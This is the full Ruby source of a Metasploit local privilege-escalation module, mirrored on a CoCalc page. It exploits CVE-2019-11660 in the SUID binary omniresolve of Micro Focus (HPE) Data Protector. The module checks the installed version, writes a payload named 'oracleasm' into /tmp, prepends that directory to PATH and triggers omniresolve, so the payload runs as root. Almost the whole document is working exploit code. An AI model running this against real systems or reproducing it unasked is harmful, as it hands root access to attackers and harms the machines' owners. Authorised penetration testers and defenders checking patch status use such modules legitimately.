CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/local/omniresolve_suid_priv_esc.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::Linux::Priv10include Msf::Post::Linux::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper13prepend Msf::Exploit::Remote::AutoCheck1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',20'Description' => %q{21This module exploits the trusted `$PATH` environment22variable of the SUID binary `omniresolve` in23Micro Focus (HPE) Data Protector A.10.40 and prior.2425The `omniresolve` executable calls the `oracleasm` binary using26a relative path and the trusted environment `$PATH`, which allows27an attacker to execute a custom binary with `root` privileges.2829This module has been successfully tested on:30HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016;31Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)3233The vulnerability has been patched in:34Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 201935},36'License' => MSF_LICENSE,37'Author' => [38's7u55', # Discovery and Metasploit module39],40'DisclosureDate' => '2019-09-13',41'Platform' => [ 'linux' ],42'Arch' => [ ARCH_X86, ARCH_X64 ],43'SessionTypes' => [ 'shell', 'meterpreter' ],44'Targets' => [45[46'Micro Focus (HPE) Data Protector <= 10.40 build 118',47{ upper_version: Rex::Version.new('10.40') }48]49],50'DefaultOptions' => {51'PrependSetgid' => true,52'PrependSetuid' => true53},54'References' => [55[ 'CVE', '2019-11660' ],56[ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]57],58'Notes' => {59'Reliability' => [ REPEATABLE_SESSION ],60'Stability' => [ CRASH_SAFE ],61'SideEffects' => [ARTIFACTS_ON_DISK]62},63'DefaultTarget' => 064)65)6667register_options(68[69OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])70]71)7273register_advanced_options(74[75OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])76]77)78end7980def base_dir81datastore['WritableDir'].to_s82end8384def suid_bin_path85datastore['SUID_PATH'].to_s86end8788def check89return CheckCode::Safe("#{suid_bin_path} file not found") unless file? suid_bin_path90return CheckCode::Safe("#{suid_bin_path} is not setuid") unless setuid? suid_bin_path9192info = cmd_exec("#{suid_bin_path} -ver").to_s93if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/94version = '%.2f' % ::Regexp.last_match(1).to_f95build = ::Regexp.last_match(3).to_i96vprint_status("omniresolve version #{version} build #{build}")9798unless Rex::Version.new(version) < target[:upper_version] ||99(Rex::Version.new(version) == target[:upper_version] && build <= 118)100return CheckCode::Safe101end102103return CheckCode::Appears104end105106vprint_error('Could not parse omniresolve -ver output')107CheckCode::Detected108end109110def exploit111if !datastore['ForceExploit'] && is_root?112fail_with(Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.')113end114115unless writable?(base_dir)116fail_with(Failure::BadConfig, "#{base_dir} is not writable")117end118119payload_path = File.join(base_dir, 'oracleasm')120register_file_for_cleanup(payload_path)121write_file(payload_path, generate_payload_exe)122chmod(payload_path)123124trigger_path = File.join(base_dir, Rex::Text.rand_text_alpha(10))125register_file_for_cleanup(trigger_path)126write_file(trigger_path, "#{rand_text_alpha(5..10)}:#{rand_text_alpha(5..10)}")127cmd_exec("env PATH=\"#{base_dir}:$PATH\" #{suid_bin_path} -i #{trigger_path} & echo ")128end129end130131132